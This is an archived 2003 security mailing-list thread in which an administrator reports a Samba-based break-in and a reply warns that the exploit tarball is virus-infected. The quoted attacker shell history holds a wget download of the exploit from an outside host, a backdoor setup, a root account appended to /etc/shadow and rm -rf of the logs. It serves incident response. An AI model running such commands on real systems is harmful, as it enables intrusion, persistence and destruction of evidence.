Just in case anyone gets the great idea of downloading this tar.gz and check it out for themselves, beware! These binaries are infected with a variant of the linux.jac virus. If these binaries executed on your machine with root privs, you are hosed for 'plenty' of other reasons than just being rooted. Remember to always AV scan binaries obtained in the wild, and never examine binaries in an environment that you can't throw away(or reboot). use FIRE... http://fire.dmzs.com W Steve Bromwich <incidentat_private> said: > Hi, > > Has anyone seen an msamba exploit? A client of mine was cracked last night > using this. Whoever it was configured it to erase everything after a > reboot (I got in in time to see a lot of rm -rf and killed the box). I've > now reinstalled and restored the data, but I suspect the script kiddie is > trying to get in again. He was nice enough to leave a .bash_history in > /root: > > ps -aux > w > find // | grep *db > find // | grep *.db > find // | grep index.html > cd /var/www > ls -al > cd tracking > ls -al > cd files > ls -al > cd /usr/share/sgml/docbook/stylesheet/dsssl/modular/images > ls -al > exit > cd /usr/share/doc > ls -al > cd /var/www > ls -al > find // | grep *.log > cd tracking > ls -al > cd files > ls -al > find // | grep index.* > find // | grep shop.mdb > find // | grep *.mdb > exit > cd /var > locate order.log > locate order.txt > locate mdb > locate metacart > locate card > cd www > echo "qe3 wuzz here uid=0">about_us.html > ps -aux > cd /etc/init.d > ls -al > ./apache reload > ps -aux > cd /usr/etc > ls -al / > df > cd /opt > ls -al > wget cahcepu.net/dhegleng/msamba.tar.gz > pstree -p > chmod 555 /tmp > chmod 555 /var/tmp > chmod 555 /var/vbox > /usr/sbin/lsof |grep LISTEN > /sbin/fuser -n tcp 23 > w > dir > tar xzvf 73.tgz > cd " " > dir > ls > cd .. > dir > cd evil > ./setup muie 55055 angelboy@the-darkside.info > w > passwd daemon > passwd daemon > echo uid:x:0:0::/:/bin/bash >> /etc/shadow > passwd $uid > w > locate .log > rm -rf /var/log/ > chmod 555 /tmp > chmod 555 /var/tmp > w > pstree -p > > I picked up the copy of msamba and had a look at it; it looks like it's > exploiting the recent samba bug for a wide variety of platforms (*BSD, > SuSE, Slackware, Redhat, Mandrake, Gentoo and Debian). There's a tag in > there that says "*** JE MOUET JE MUIL HOUWE - qe3" which I think might be > Dutch (and I think, based on scans I'm seeing, the guy might be coming in > from an IP registered to cyberangels.nl, but I don't have any hard proof). > > Mail is being sent to slamet_irdakat_private once the exploit gets in, > with output from uname -a and id being sent. The datestamp on the files > are 18 April 08:43, which makes me think this might be close on a zero day > exploit. I can't find anything about msamba googling around, either. The > only other hint I had was the client mentioned there was "a lot of stuff > about gzip running out of memory on the screen". > > Unfortunately I don't have the data from the drive to do any forensics on; > as /var/log had been deleted it wasn't felt justified to go in deeper, and > I just reformatted and reinstalled. > > Anyone else seen this? I'd like to make sure I've got everything tied down > enough that this won't happen again. Samba wasn't supposed to be on there, > and it's now been removed. I have a suspicion ssl might have been involved > too, due to the gzip comment and the way apache was reloaded. > > Cheers, Steve > > ---------------------------------------------------------------------------- > Attend Black Hat Briefings & Training Europe, May 12-15 in Amsterdam, the > world's premier event for IT and network security experts. The two-day > Training features 6 hand-on courses on May 12-13 taught by professionals. > The two-day Briefings on May 14-15 features 24 top speakers with no vendor > sales pitches. Deadline for the best rates is April 25. Register today to > ensure your place. http://www.securityfocus.com/BlackHat-incidents > ---------------------------------------------------------------------------- > > > -- William Salusky changeat_private cell: 415-747-6775 ---------------------------------------------------------------------------- Attend Black Hat Briefings & Training Europe, May 12-15 in Amsterdam, the world's premier event for IT and network security experts. The two-day Training features 6 hand-on courses on May 12-13 taught by professionals. The two-day Briefings on May 14-15 features 24 top speakers with no vendor sales pitches. Deadline for the best rates is April 25. Register today to ensure your place. http://www.securityfocus.com/BlackHat-incidents ----------------------------------------------------------------------------
This archive was generated by hypermail 2b30 : Tue Apr 22 2003 - 07:37:06 PDT